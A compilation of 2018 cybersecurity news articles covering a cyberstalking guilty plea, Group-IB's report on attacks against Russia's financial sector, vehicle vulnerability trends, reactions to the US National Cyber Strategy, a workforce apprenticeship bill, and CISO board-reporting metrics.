- Cyber -

Last update 09.10.2017 12:44:39




Ex-NASA Contractor Pleads Guilty in Cyberstalking Scheme
14.10.2018 securityweek
Cyber
A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has pleaded guilty to federal charges.

Twenty-eight-year-old Richard Bauer of Los Angeles entered pleas Thursday to stalking, computer hacking and aggravated identity theft.

Bauer acknowledged victimizing friends, family members, high school and college acquaintances and co-workers.

Bauer, pretending to ask questions on Facebook for a class, got some victims to reveal information he used to reset their online passwords and harvest photos. He got other victims to install computer malware allowing him to access their computers.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.


Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks
10.10.2018 securityaffairs
Cyber

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector.
Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT-groups; however, stolen money is not the most dangerous thing that could happen to a financial organization,” says Ilya Sachkov, Group-IB CEO and founder. “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies; however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted an attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that would conduct thefts from individuals using banking Trojans for PCs. This trend of declining threats from banking Trojans for PCs has continued in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and company executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users; however, in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in damage among customers is that banks and payment systems are introducing early fraud detection technologies that use behavioral analysis algorithms to detect attacks that combine social engineering scams, phishing, botnets, illegal money withdrawal networks, fraud across multiple channels, and other types of banking fraud on all customer devices and platforms.

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 is stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest number of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

“Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”


Researchers See Improvements in Vehicle Cybersecurity
27.9.2018 securityweek
Cyber

Data from vulnerability assessments conducted by security consulting firm IOActive in the past years shows some improvements in vehicle cybersecurity.

Since 2013, IOActive has spent thousands of hours every year analyzing vehicle cybersecurity, and the company has published several research papers on this topic. A report made available in 2016 showed that half of the flaws found at the time had an impact level of critical (25%) or high (25%).

The company describes critical vulnerabilities as issues that would have an “extreme impact” on a vehicle if exploited, would likely receive media attention, and are almost certain to be exploited. High severity flaws have a “major impact,” could represent a regulatory violation, and are relatively easy to find and exploit even by a less skilled attacker.

IOActive on Tuesday published a follow-up report to the one from 2016. The latest data, collected in 2016 and 2017, shows that only 10% of the vulnerabilities were critical and 23% were high in terms of impact.

Impact rating of car vulnerabilities

“Critical-impact vulnerabilities have decreased 15 percentage points, while the distribution of medium- and low-impact vulnerabilities has increased. This is likely the result of better security awareness and user separation. We’ve seen significant growth in the design of vehicle systems to incorporate security from the start. This includes making sure that the processes that handle data are running with limited privileges, which helps lower the impact of the most likely attacks,” IOActive said in its latest report.

In terms of likelihood of exploitation, the percentage of critical flaws has increased from 7% to 11%, and the percentage of high severity flaws has decreased from 21% to 17%. However, a majority of the detected security holes fall in the medium or low likelihood categories, which means they are not easy to exploit or they require another vulnerability for exploitation.

“We’ve seen security architecture improve significantly but we’ve also seen an expansion in the number and scope of remote services that could be leveraged to attack the system,” IOActive said.

There have also been significant improvements in terms of overall risk posed by vulnerabilities. Six percent of the flaws discovered in 2016 and 2017 were assigned a critical risk rating and 22% a high risk rating. In comparison, the previous report classified 22% of flaws as critical and 18% as high risk.

As for attack vectors, which IOActive says are useful for determining how an attacker could target a system, the latest report shows that the most common vectors for the vulnerabilities discovered by the company are local access and network access. There has also been a significant increase in flaws that can be exploited over a serial connection, which requires physical access to the device.

“The large increase in local and serial attacks can be attributed to a shift in testing approaches. As security has become a more prevalent concern, more companies are providing documentation and debugging access to help identify vulnerabilities inside their systems. The automotive industry is also taking more of an interest in lower-level security features, like secure boot, which is reflected in the areas we end up testing,” researchers said.

The most common types of vulnerabilities identified in the latest report are coding logic errors (26%), memory corruptions (16%), privilege issues (14%), and information disclosure bugs (12%).

IOActive’s analysis shows that a majority of flaws, 59%, require low-effort fixes and only 12% are difficult to patch.


Industry Reactions to New National Cyber Strategy
24.9.2018 securityweek
Cyber

The White House last week announced the release of the 2018 National Cyber Strategy, which outlines the government’s plans for ensuring the security of cyberspace.

Described by officials as the “first fully articulated cyber strategy in 15 years,” the new strategy describes how the current administration plans on protecting the country against cyber threats and strengthening the United States’ cyber capabilities.

The strategy shows that the U.S. is prepared to take a more aggressive posture, which includes an offensive response against nations engaging in cyber activity aimed at the country. Officials warned that the government’s response to a cyberattack may not necessarily be in the cyber world.

Industry professionals contacted by SecurityWeek commented on various aspects of the new strategy, pointing out its benefits, shortcomings, and the unanswered questions it raises.

And the feedback begins...

Dave Weinstein, VP of Threat Research at Claroty:

“Most government strategy documents tend to be underwhelming and this one is no different. This isn't a whole lot of new content or ideas, but rather amplification, clarification, and renewal of previous ones.

The paragraph that stands out to me is the one on the Cyber Deterrence Initiative. Until now we haven't formally adopted an international approach to deterrence, which includes collaborating on incident response and attribution. This Initiative has enormous potential to be successful if the right nations formally participate and equally contribute to its cause. I would expect to see the Five Eyes join in but it should extend even further, beginning with NATO member-states.

Another one that stands out to me and is much overdue is modernizing of surveillance and computer crime laws. The Computer Fraud and Abuse Act (CFAA) in particular is in desperate need of a refresh.

On critical infrastructure, it's encouraging to see it featured so prominently in the Strategy but the substance is a bit lacking. More creativity is needed for government to maximize its contributions to what is largely a private sector problem. Some of the best ways for government to "secure critical infrastructure" is to incentivize investment in technology, people, and training; share actionable threat intelligence; and deter activities that hold infrastructure assets (and the citizens they serve) at risk. Again, some of these are mentioned but not in great detail.

Would've liked to see a bit more emphasis on state and local cybersecurity as a key component of the national strategy.

They punted on encryption -- would've liked to see them take a strong stance on encryption while committing to foster a dialogue between the public and private sector recognizing the real concerns of law enforcement and the national security establishment.

Was struck by the explicit mention of transportation and maritime cybersecurity -- would've thought energy and maybe even advanced manufacturing would have received similar attention (especially given the Administration's domestic policy priorities).”

Nathan Wenzler, chief security strategist at AsTech:

“Politicizing matters of cybersecurity only serves as a detriment to us all. Nearly every human on this planet is served in some way, shape or form by technology and the various forms of communication and information delivery, and taking security seriously and promoting it consistently is critical to safeguard the access to information for all of us going forward. However, this Cyber Security Strategy document released by the White House does not do much of anything to serve this purpose on its own account, and even more so when viewed alongside with other security-related matters that this administration has weighed in on. For example, Pillar IV of the White House's plan states that "The United States stands firm on its principles to protect and promote an open, interoperable, reliable and secure internet." Yet, this comes from the same administration whose FCC has killed Net Neutrality and arguably has laid the groundwork for the exact opposite thing taking place. Pillar III discusses addressing the interference of foreign powers executing propaganda and other counter-intelligence campaigns against the United States, yet we've witnessed repeated efforts from this administration to stop efforts to do exactly that in several situations, including the influencing of voters during the last major election cycle. Ultimately, this strategy document strikes me as nothing more than hyperbole, or as a distraction from the contrary actions this administration has already taken that nullify most of the principles outlined here.

Perhaps the most troubling part of this is the change in tone from looking to bolster the cybersecurity defenses of the United States, including the hiring and retaining of qualified information security professionals to raise the overall cybersecurity capabilities of government agencies, to one of aggression and taking an offensive stance against those deemed to be enemies of the state. It's a short collection of statements buried in the strategy, but National Security Advisor Tom Bolton has already confirmed that executing more counterattacks and taking this more aggressive and offensive position is the intent. This is, in my opinion, an incredibly dangerous strategy to take, especially when it comes to cyberwarfare initiatives. It's simply too easy for conflicts to escalate, and it does not require huge armies or massive amounts of money or government support for a malicious actor to do incredible damage from a technological perspective. A single actor could, potentially, take down power grids or even impair the internet itself (look at the attacks against the root DNS servers in years past as an example). Escalating conflicts in cyberspace is not the same as bringing a huge show of military force to a conventional battlefield, and it is with this mindset that the current administration appears to be working from, demonstrating a lack of understanding of what we are collectively facing from a cybersecurity perspective and of the risk involved in performing acts of aggression in this arena.”

Sherban Naum, SVP of Corporate Strategy and Technology for Bromium:

“The Strategy is a policy vehicle. The key concern is once the strategy has been fully executed, it must drive acquisition in a timely fashion to be effective. What funding vehicle will support implementing the actual cyber tools necessary to deliver on the policy changes? Who will drive the acquisitions? Will they be consolidated under a single OSD mandate and funding action, coalescing all funding to a single activity or will OSD mandate the changes, leaving the services to both fund and implement? If the latter, how will the mandate compete with other necessary funding efforts, considering the sheer volume of legacy infrastructure in place today under sustainment? Are there technologies that have been vetted of recent that have proven to deliver vastly new capabilities that satisfy both defensive protection-first while delivering the threat telemetry needed to take offensive action based on clear attribution? The DoD has been unsuccessful in implementing clear and agile acquisition changes despite the many years as a stated goal.

I’m not sure accepted international rules of engagement in kinetic warfare translate equally to that in cyber space. In kinetic warfare there are clearly defined rules of engagement, both Federal Defense policy as well as International governing bodies, and these rules need to be better defined in the cyber world. The specific call out for international consensus and support is paramount. Modern Cyber Warfare may come down to the creation of a Cyber “NATO-like” body that acts both as a unifying body toward response and a deterrent to nation state attackers. Attack one, attack all.”

Bryson Bort, Founder & CEO of SCYTHE:

“This is the most comprehensive cybersecurity strategy document ever published—firmly stating a vision of the United States as ensuring a secure Internet by cooperation or force. It reads like a response to former NSA Director Admiral Mike Rogers’ February Congressional testimony where he acknowledged current constraints in responding to the active threat landscape the US faces.

The ambitious scope is easily reflected in just a few standout items: replacing social security numbers for identity management; addressing IOT security through the full lifecycle, although not post-deployment; a global “Cyber Deterrence Initiative” to strengthen partner law enforcement and information sharing capabilities; and the promise of “swift and transparent consequences” to deter attacks.

The message appears to be: you will see an American Flag planted on your scorched computer(s).”

Ali Golshan, CTO and co-founder at StackRox:

“While the new Trump administration cyber policy is not a major deviation from President Obama's initiative in 2016, the focus now is on enabling agencies – specifically the Defense Department - to respond more quickly to cyber threats. Under the Obama cyber policy, various defense and intelligence agencies were required to coordinate offensive cyber operations to ensure they had no impact on government operations. The Trump policy allows organizations to respond without cross-agency coordination.

Unlike traditional warfare, where exposing one's arsenal deters an adversary, in cyber offenses, capabilities are kept confidential so as to not reveal capabilities. Historically, this approach has been a more effective deterrent. Considering the nature of cyber weapons and the ability to reuse them once discovered, as well as the difficulty of accurate attribution (accurately determining the attacker/location/country), one could argue that responding without cross-agency coordination brings higher risk.”

Jack Jones, Co-Founder and Chief Risk Scientist at RiskLens:

“As a high level statement of intent/direction, it seems fine. In order to make it actionable though, several things have to happen:

Organizations who want (or have) to follow this directive need to be able to accurately determine where they stand relative to the objectives described in this document.
Then, for each sub-objective within this directive, they have to prioritize the gaps between where they are and where they need to be — and prioritization is invariably a function of measurement (risk measurement in this case).
Then they have to compare the various options for closing any gaps (the most important gaps first, of course) to ensure that the most cost-effective remediations are chosen. These comparisons also are dependent on accurate risk measurement.
As these efforts get underway, cybersecurity organizations need to be able to adjust intelligently to changes in the landscape that might alter priorities or solutions. This, too, requires risk measurement.

Of course, nowhere in here is there any explicit reference to improving the profession’s ability to measure risk — even though the success of everything else is dependent on it to some degree and it is one of the most deficient areas in the profession. This reflects continued ignorance on a fundamental element of risk management.”

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“The new Strategy appropriately builds on the work of past Administrations. Particularly when read in conjunction with the DOD Cyber Strategy also released this week, the National Cyber Strategy also recognizes that going on offense is becoming more critical to playing daily cyber defense.

The Strategy has a few notable points as to protecting critical infrastructure. First, the Strategy emphasizes leveraging information and communications technology providers to detect, prevent and mitigate risk at the system level. Second, it prioritizes improved cybersecurity in the transportation industry, particularly maritime transportation. This is particularly noteworthy in light of last year’s NotPetya cyberattack, which significantly affected such transportation companies as Maersk and Federal Express. Third, the Strategy falls short in addressing election cybersecurity by throwing up state and local election control as a seemingly insurmountable obstacle.

The Strategy also recognizes that we have a long way to go in combating international cybercrime. It notes that some criminal groups now rival nation state actors in sophistication, and that rampant, technology-facilitated intellectual property theft is having a potentially deleterious effect on our long-term economic and national security. The Strategy appropriately prioritizes incident reporting and response, updating legal tools for the investigation and prosecution of technology-facilitated crimes, apprehending and successfully prosecuting more international cybercriminals, and helping other nations implement similar strategies.”

David Ginsburg, Vice President of Marketing at Cavirin:

“In one way this is helping to further codify and bring into the open actions that the US are already taking. For example, the cyber-attacks against North Korea’s missiles, as described in Woodward’s ‘Fear.’ As a public document, it also serves notice that our responses will be on-par with approaches already taken by our adversaries. In doing this, I don’t think there is a danger of unnecessary escalation. However, we must balance our offensive capabilities with maintaining a more effective cyber posture within the various government agencies. We’ve read all too often about oversights due to lack of training, automation, or adoption of best practices. And, the strategy document is very timely given documented threats against this November’s election.”

Rick Moy, Chief Marketing Officer at Acalvio:

“This is a fairly broad and comprehensive strategy, that touches on everything from government supply chain, critical infrastructure, and democratic institutions all the way to space. While the devil will be in the details of executing this, there is a good range of priorities, including emphasis on streamlining civilian cybersecurity responsibilities, risk and vulnerability management, improving incident response. Of particular interest will be the efforts to deter attackers and ultimately hold them responsible through state-level sanctions and extradition.”

Rishi Bhargava, Co-founder at Demisto:

“One facet of this strategy that has the potential for long-lasting consequence is the US government’s commitment to develop a superior cybersecurity workforce. Today’s industry truth is that security professionals are tough to hire, train and retain. A government-led approach to expand educational opportunities and encourage re-skilling of workers will help build the talent pipeline and lead to better staffed organizational security departments. Security teams are overworked and will need all the help they can get.”


New Bill Aims to Address Cybersecurity Workforce Shortage
18.9.2018 securityweek
Cyber

A bill introduced last week by U.S. Rep. Jacky Rosen (D-Nev.) aims to address the cybersecurity workforce shortage through a grant for apprenticeship programs.

The new bill, called the Cyber Ready Workforce Act, is inspired by Nevada’s recently introduced cybersecurity apprenticeship program. This new piece of legislation would help establish a program within the Department of Labor for awarding grants, on a competitive basis, to workforce intermediaries.

The goal is to create, implement and expand cybersecurity apprenticeship programs. Apprentices will benefit from support services that include career counseling, mentorship, and assistance with housing, transportation and child care costs.

Programs eligible for grants can include ones providing technical instruction, workplace training, and certifications for support specialists, support technicians, programmers, cybersecurity specialists, and system analysts.

“The demand for talent in cybersecurity is sky-high, and we’re putting ourselves at risk if we don’t address this shortage in our workforce,” said Congresswoman Rosen. “I’m committed to ensuring that businesses and government have the skilled people and critical tools they need to enhance our nation’s cybersecurity infrastructure, help industry thrive, and strengthen our national security. Everything we do in today’s economy is shaped by technology, and I will continue to work with my House colleagues to ensure our families and communities are better protected against cyber threats.”

The initiative is backed by several lawmakers in Massachusetts and New York, and organizations such as the CompTIA tech association and The Learning Center.

“Investing in and expanding our cybersecurity workforce doesn’t only fuel our economy, it keeps us safe,” said Congressman Seth Moulton. “While I was fighting on the ground in Iraq, Al-Qaeda was fighting us on the internet — and they were beating us online! And while we focused on Russia’s military in 2016, they attacked us through the internet. This bill is an important first step towards making sure we don’t get ourselves into such a vulnerable position again.”

The bill introduced by Rep. Rosen, who is a member of the House Armed Services Committee and the Congressional Cybersecurity Caucus, cites NIST’s CyberSeek, which shows that there are more than 300,000 cybersecurity job openings at the moment.


CISOs and the Quest for Cybersecurity Metrics Fit for Business
18.9.2018 securityweek
Cyber

Never-ending breaches, ever-increasing regulations, and the potential effect of brand damage on profits have made cybersecurity a mainstream board-level issue. It has never been more important for cybersecurity controls and processes to be in line with business priorities.

A recent survey by security firm Varonis highlights that business and security are not fully aligned; and while security teams feel they are being heard, business leaders admit they aren't listening.

The problem is well-known: security and business speak different languages. Since security is the poor relation of the two, the onus is absolutely on security to drive the conversation in business terms. When both sides are speaking the same language, aligning security controls with business priorities will be much easier.

Well-presented metrics are the common factor understood by both sides and could be used as the primary driver in this alignment. The reality, however, is that this isn’t always happening.

Using metrics to align Security and Business

SecurityWeek spoke to several past and present CISOs to better understand the use of metrics to communicate with business leaders: why metrics are necessary; how they can be improved; what are the problems; and what is the prize?

Demolishing the Tower of Babel

“While some Board members may be aware of what firewalls are,” comments John Masserini, CISO at Millicom Telecommunications, “the vast majority have no understanding what IDS/IPS, SIEMs, Proxies, or any other solution you have actually do. They only care about the level of risk in the company.”

CISOs, on the other hand, understand risk but do not necessarily understand which parts of the business are at most risk at any time. Similarly, business leaders do not understand how changing cybersecurity threats impact specific business risks.

The initial onus is on the security lead to better understand the business side of the organization to be able to deliver meaningful risk management metrics that business leaders understand. This can be used to start the process for each side to learn more about the other. Business will begin to see how security reduces risk, and will begin to specify other areas that need more specific protection.

The key and most common difficulty is in finding and presenting the initial metrics to get the ball rolling. This is where the different ‘languages’ get in the way. “The IT department led by the CIO typically must maintain uptime for critical systems and support transformation initiatives that improve the technology used by the business to complete its mission,” explains Keyaan Williams, CEO at CLASS-LLC. “The Security department led by the CISO typically must maintain confidentiality, integrity, and availability of data and information stored, processed, or transmitted by the organization. These departments and these leaders tend to provide metrics that focus on their tactical duties rather than business drivers that concern the board/C-suite.”

Drew Koenig, consultant and host of the Security in Five podcast, sees the same basic problem. “In security there tends to be a focus on the technical metrics. Logins, blocked traffic, transaction counts, etc... but most do not map back to business objectives or are explained in a format business leaders can understand or care about. Good metrics need to be tied to dollars, business efficiency shown through time improvements, and able to show trending patterns of security effectiveness as it relates to the business. That's the real challenge.”

Williams sees the problem emanating from a lack of basic business training in the academic curriculum that supports IT and security degrees. “The top management tool in 2017 was strategic planning,” he said. “Strategic planning is often listed as one of the top-five tools of business leaders. How many security leaders understand strategic planning and execution enough to ensure their metrics contribute to the strategic initiatives of the organization?”

It is not up to the business leaders to learn about security. “The downfall for many CISOs in the past is believing that business needs to understand security,” adds Candy Alexander, a virtual CISO and president-elect of ISSA. “That is a mistake, because security is our job. We need to better understand the business, so that we can articulate the impact of not applying appropriate safeguards. The key to this whole approach is for the CISO to understand the business, and to understand the mission and goals of the business.”

Is it worth the effort?

With no exception, the CISOs SecurityWeek spoke to believe that better presentation of the right security metrics will help align security and business. In fact, comments Alexander, “It is the only way CISOs can get executive management to understand what the challenges are and what the successes have been.”

That doesn’t make it any easier. Apart from metrics and the security/business dynamic, CISOs must also understand the psychology of the boardroom – and that will vary from company to company. “Some boards care greatly about security, and others have little interest,” comments Daniel Miessler, director of client advisory services at IOActive. “If, for example, the business is being crushed by a competitor, having nothing to do with security, then it could be (but not always) that security is justifiably a lower priority to the board.”

Timing thus becomes an issue over which the CISO may have little control. Should metrics presentations be regular or given only when necessary? The former may unnecessarily take up the business leaders’ time, while the latter will paint the CISO as the bringer of doom.

Tomas Honzak, CISO at GoodData, feels that reporting should be rare. “The board should not be hearing about security on a regular basis,” he told SecurityWeek. “Unless there is a critical issue or significant business transformation, an annual presentation of the key trends, evolution of the threat landscape and strategic security plans are all that the board should be receiving from security.”

This is a minority view. Many CISOs at least imply that metrics reporting should be delivered sufficiently frequently to be able to show trends.

And then there’s style. Having got the opportunity to present to business leaders, it is very important that it is not wasted. “Many reports are like some presenters – single toned and boring,” comments Steven Lentz, head of security at Mojio and former CSO at Samsung Research America. “The report is either too long (too much detail) or too much fluff. If the report is not good it will simply cause more questions to be asked.”

The solution, he suggests, is that CISOs need to be salespeople and marketers as well as security experts. The presentation itself must be like a good CV, able to capture attention within the first few sentences and maintain interest through the duration. Critically, he adds, “The report will answer questions rather than having the board question the report.”

This is key and strikes at the very core of metrics reporting. If the purpose is to say, ‘look how good your security team is’, or to highlight a new problem that needs more budget, then you should expect queries. But if the purpose is to align your security with business priorities then the metrics need to be more self-explanatory. They can be provocative, to provoke comment and discussion with and from the business leaders, but they should not elicit queries on the reporting itself.

Are CISOs delivering adequate metrics to the board?

Asked if CISOs are currently delivering good metrics, the answer was an unequivocal yes and no, maybe, it depends, but probably not.

Metrics reporting is a classic chicken and egg problem. To deliver good metrics, the CISO must understand what the business leaders want; but understanding this want comes through aligning security and business through delivering effective security metrics.

Ideally, the CISO should already be at the level of the C-Suite. “A critical enabler delivering business-centric metrics is that the security function is not simply reporting up into the C-suite but is instead being part of that level,” suggests Raef Meeuwisse, a CISO consultant and author of Cybersecurity for Beginners. “Only where security is engaged and involved in the highest levels of the business can any organization hope that their security approach, including what is measured and reported, will reflect a deep understanding of the business strategy, direction and needs.”

That, sadly, is rarely possible. “Unfortunately, the governance crisis continues,” explains Tom Kellermann, chief cybersecurity officer at Carbon Black, “as most CISOs still report to CIOs. Your defensive coordinator is reporting to your offensive coordinator.” What the CIO is often most interested in learning (how often security has prevented downtime) is not the same as what security should be reporting to business (such as how, why, and by how long dwell time has been reduced).

Poor metrics are more common than no metrics. “For example, I see many security programs that report on the number of threats blocked by security tools because the logs are easy to parse. It is a bonus that the volume of blocked threats sounds impressive. Unfortunately, this data rarely informs the business decisions that concern the board/C-suite.”

Do vendors help with producing metrics from their applications?

It would help if vendors produced readymade presentable metrics as part of their application reporting capabilities. Some are trying. “With a resurgence of interest in quantifying one’s security posture, vendors are looking more to provide this across different parts of the hybrid infrastructure,” explains Anupam Sahai, VP of product management at Cavirin. “This is also a major initiative by service providers and MSSPs. The Verizon Risk Report is a good example.”

Not all vendors agree. “This is not a vendor issue,” said Chris Morales, head of security analytics at Vectra.

“The issue is whether or not there is solid alignment between the metrics that security wishes or needs to use and the information that the board requires,” explains Steve Durbin, MD of the Information Security Forum. His concern is that applications usually generate a high volume of detailed statistics that require significant processing (normalization, aggregation and analysis) before they can be interpreted and presented to the board.

The metrics presented to the board, he continued, “should convey details relating to targets of particular interest to each audience, and be clear, concise and limited in number (often four or five).”

Chris Key, CEO and co-founder of Verodin, goes further. “Relying on a vendor to provide meaningful metrics on the effectiveness of the control they sold you is like having the fox watch the hen house. Additionally, no single vendor's control represents the effectiveness of an organization’s full cybersecurity strategy.”

Less bluntly, Meeuwisse explains, “Vendors have a tough time because they are usually being squeezed on price, often asked for their security metrics in a different format for each customer and can be trying to achieve security on a smaller budget than many of their customers. As someone who has audited tens of different suppliers in my time, I almost always find substantial gaps. Most vendors show an increasing willingness to provide security metrics, but my own experience is those metrics, when available, are usually carefully crafted to avoid displaying any real issues.”

“Some vendors require log aggregation to a separate reporting server running its own analytics software, which can be an expensive and complex solution,” comments Heather Paunet, VP of product management at Untangle. “Additionally, some vendors only offer very high-level, canned reports that don't enable administrators to drill down on specific issues, limiting their usefulness.”

For board-level metrics, analytics data must often be combined with some sort of cost-benefit analysis, something that few vendors provide out-of-the-box. “It's important,” she suggests, “that security teams select vendors who provide database-driven reporting that can be easily customized to fit their needs.”

The consensus is that vendors can and should provide raw data on their product performance, but the CISO will always need to collect, correlate, analyze and present the right metrics in the right form in a manner that directly relates to the interests and concerns of business leadership.

What makes a good metric?

This all begs the question: what makes good metrics that are relevant to business leaders and can be used to further the alignment of security and business?

“Transforming security metrics into business information requires a change in focus and reporting format,” claims Williams. “Businesses measure progress and performance using scorecards, monthly or quarterly business reviews, and KPIs. Any security metrics provided to the business need to contribute to the performance measures that the business is already conducting. Providing security information that answers business questions is far superior to providing technical information and log details that have no relationship to business goals and objectives.”

“I like the old cliché that metrics need to be SMART – Specific, Measurable, Accurate, Reliable and Timely,” suggests Martin Zinaich, information security officer at the City of Tampa, Florida. “If done properly metrics can help align the Security Office to the Business and vice versa.”

He likes to keep things simple but informative. “Using standard Red/Yellow/Green indicators can quickly show the board alignment to risk, compliance and governance. Graphs can be leveraged to show risk reduction over time and overall framework alignment. Quad charts can quickly show top risks, issues requiring management attention, any major incidents and relevant projects in-flight. The goal is to be informative but brief, not technical, but statistical and aligned for a business/infosec synergic relationship.”

Sahai agrees that simple is best. “Consider the FICO score,” he says. “So, a single metric, say on a scale of 0 (worst) to 100 (best), that reflects a combination of the organization’s security and compliance posture.” The devil, of course, is in the detail. “If you look at how hackers infiltrate and compromise an organization, a score may be developed using the same approach. You first discover and classify resources, both on-prem and in the cloud, and assess threats against them, both internal and external. Based on this assessment, you identify any weaknesses and then evaluate the resources against any controls in place.”

The result, he continued, “is an overall score that reflects the organization’s current cyber posture. Correcting identified weaknesses will raise the score. Additional elements that go into scoring may include the likelihood of the breach and the projected impact. This latter point can map to the CIA model – confidentiality, integrity, and availability.”

Trends are important. “Can you provide month-over-month statistics of how each business unit has reduced the inherent risk across the company because the average time to patch has decreased significantly?” asks Masserini. “Those are the types of metrics the Board cares about, not how many attacks the firewall blocked, or how many patches are missing across the entire infrastructure, or any other ‘frighten them with huge numbers’ type metrics.”

Those huge numbers may be relevant to infosec at the operational level, says Bonney. But, he adds, “At the board level, it’s fundamentally speaking the board’s language – the board has a fiduciary duty to protect the business and keep it a going and growing concern. Align the metrics you report to the board with these goals. Deliver the metrics in terms they understand – impact on the business not impact on or of the technology – and make sure they know what the ask is. Never leave a board meeting without making the ask.”

Lentz also agrees that reporting must be continuous, with trends rather than static points in time. “I believe you also need to do a trend report,” he said. “In other words, over time – say month to month – showing a year. This way the board can clearly see wins, improvements, and areas of concern that need addressing. A clear visual presentation and roadmap so the board can grasp rather than look confused.”

Morales goes deeper and offers specific metrics to include: dwell time, lateral movement, reinfection, network coverage and response time.

Miessler and Kellermann show how these issues can be combined and worked into business-centric metrics.

